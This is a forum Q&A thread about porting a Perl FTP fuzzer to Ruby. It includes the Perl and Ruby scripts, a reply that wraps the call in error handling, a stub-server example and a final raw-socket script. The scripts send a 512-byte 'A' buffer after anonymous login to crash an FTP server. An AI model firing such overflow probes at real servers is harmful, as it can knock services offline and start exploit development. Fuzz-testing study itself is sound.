Using Ruby to fuzz FTP Server
Hey, I'm new to Ruby and trying to learn by porting some progs from one language to another. Right now I'm working on an FTP fuzzer in Ruby that mirrors this Perl script:
use Net::FTP;
$target = "192.168.37.128";
$buffer = "A\x20";
$buffer .= "A" x 512;
$ftp = Net::FTP->new($target, Debug => 0, Timeout => 5)
or die "Cannot connect to $target: $@ \n";
$ftp->login("anonymous",'anonymous@nowhere.com')
or die "Couldn't log in: $@\n";
$ftp->list($buffer);
$ftp->quit;
This is my Ruby equivalent:
require 'net/ftp'
buffer = 'A\x20'
buffer = (buffer + ('A'*512))
ftp = Net::FTP.open('127.0.0.1','anonymous','anonymous')
ftp.login
ftp.list(buffer)
ftp.quit
When I run the program I get the following error:
C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:241:in `readline': end of file reached (EOF
Error)
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:241:in `getline'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:251:in `getmultiline'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:265:in `getresp'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:281:in `voidresp'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:304:in `block in voidcmd'
from C:/Ruby192/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:302:in `voidcmd'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:155:in `send_type_command'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:149:in `binary='
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:168:in `ensure in with_binary'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:168:in `with_binary'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:440:in `block in retrlines'
from C:/Ruby192/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:439:in `retrlines'
from C:/Ruby192/lib/ruby/1.9.1/net/ftp.rb:682:in `list'
from ftpcrash.rb:10:in `<main>'
I've traced the issue to the ftp.list(buffer) line, but can't come up with a Ruby solution that will accomplish what $ftp->list($buffer) does in the Perl one.
Suggestions?
The buffer is unnecessary. #list takes an optional argument like '*n', not a buffer, and it returns an array.
require 'net/ftp'
ftp = Net::FTP.open('ftp.gnu.org','anonymous','')
puts ftp.list
ftp.quit
Judging by the net/ftp.rb source code, this exception is raised when the FTP library is trying to get a response from the server and the response is empty.
You should wrap this command in begin/rescue/end (or just rescue) and handle the error accordingly.
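The handling suggested in the answer above, as an added example that is not part of the original thread: a raw-socket client that rescues the EOFError raised when the server hangs up without replying, run against a constructed loopback stub. `start_stub_server`, `send_list` and `MAX_LINE` are names and values assumed for this illustration.

```ruby
require 'socket'

MAX_LINE = 256 # assumed limit, chosen for this stub only

# Constructed stand-in for an FTP server: it speaks just enough of the control
# channel to log in, and hangs up without a reply when a command line is
# longer than MAX_LINE, imitating a daemon that dies on the input.
def start_stub_server
  server = TCPServer.new('127.0.0.1', 0) # port 0: let the OS pick a free port
  Thread.new do
    loop do
      client = server.accept
      client.write("220 stub ready\r\n")
      while (line = client.gets("\r\n"))
        break if line.bytesize > MAX_LINE
        reply = case line
                when /\AUSER /i then '331 password required'
                when /\APASS /i then '230 logged in'
                else '502 command not implemented'
                end
        client.write("#{reply}\r\n")
      end
      client.close
    end
  end
  server.addr[1]
end

# Log in, send one LIST line, and report what came back. A dropped connection
# shows up as EOFError on the next read, the same error Net::FTP raised above.
def send_list(port, argument)
  sock = TCPSocket.new('127.0.0.1', port)
  sock.readline("\r\n") # 220 banner
  sock.write("USER anonymous\r\n")
  sock.readline("\r\n")
  sock.write("PASS anonymous\r\n")
  sock.readline("\r\n")
  sock.write("LIST #{argument}\r\n")
  { status: :replied, reply: sock.readline("\r\n").chomp }
rescue EOFError, Errno::ECONNRESET, Errno::EPIPE
  { status: :connection_closed, reply: nil }
ensure
  sock&.close
end

if $PROGRAM_NAME == __FILE__
  port = start_stub_server
  p send_list(port, '*')
  p send_list(port, 'A ' + 'A' * 512)
end
```

The stub answers LIST with 502 because it has no data channel; only the difference between a reply and a closed connection matters here.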
Here's what you want, dude
#!/bin/ruby
require 'socket'
buffer = "A" * 512
host = 'xx.xx.xx.xx'
port = 21
s = TCPSocket.open(host, port)
s.recv(1024)
s.send("USER anonymous\r\n", 0)
s.recv(1024)
s.send("PASS anonymous\r\n", 0)
s.recv(1024)
s.send(buffer + "\r\n", 0)
sleep 0.3
s.close
Stay Secure ;)